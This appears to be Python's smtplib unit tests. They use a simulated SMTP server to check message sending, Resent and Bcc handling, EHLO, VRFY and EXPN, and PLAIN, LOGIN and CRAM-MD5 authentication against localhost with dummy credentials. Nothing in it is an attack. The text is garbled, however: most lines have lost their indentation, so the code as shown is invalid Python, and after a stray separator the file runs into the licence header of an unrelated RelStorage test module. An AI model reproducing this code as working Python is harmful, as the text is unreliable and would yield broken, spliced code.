def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
        # Bcc and Resent-Bcc headers are not transmitted, so drop them from
        # the copy used to build the expected output.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
        # Test various operations on an unconnected SMTP object; they
        # should raise SMTPServerDisconnected rather than an AttributeError
        # on the missing 'sock' attribute.
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = socket_helper.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
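# NOTE: hypothetical helper, not used by the tests below. It shows how a client
# answers the CRAM-MD5 challenge above: user, a space, and the hex HMAC-MD5 of the
# decoded challenge keyed by the password, all base64-encoded.
# SimSMTPChannel._auth_cram_md5 performs the matching check on the server side.
def _example_cram_md5_response(challenge=sim_cram_md5_challenge,
                               user=sim_auth[0], password=sim_auth[1]):
    decoded_challenge = base64.decodebytes(challenge.encode('ascii'))
    digest = hmac.HMAC(password.encode('ascii'), decoded_challenge, 'md5').hexdigest()
    return encode_base64((user + ' ' + digest).encode('ascii'), eol='')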
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
            self.push('504 Command parameter not implemented: unsupported '
                      'authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
    # TODO: add tests for correct AUTH method fallback now that the
    # test infrastructure can support it.
    # Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
    def test__rset_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
    def test_name_field_not_included_in_envelope_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
        # XXX smtpd converts received \r\n to \n, so we can't easily test that
        # we are successfully sending \r\n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
        # PLAIN does, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
reltestbase.py
|
# -*- coding: utf-8; -*-
##############################################################################
#
# Copyright (c) 2008 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""A foundation for RelStorage tests"""
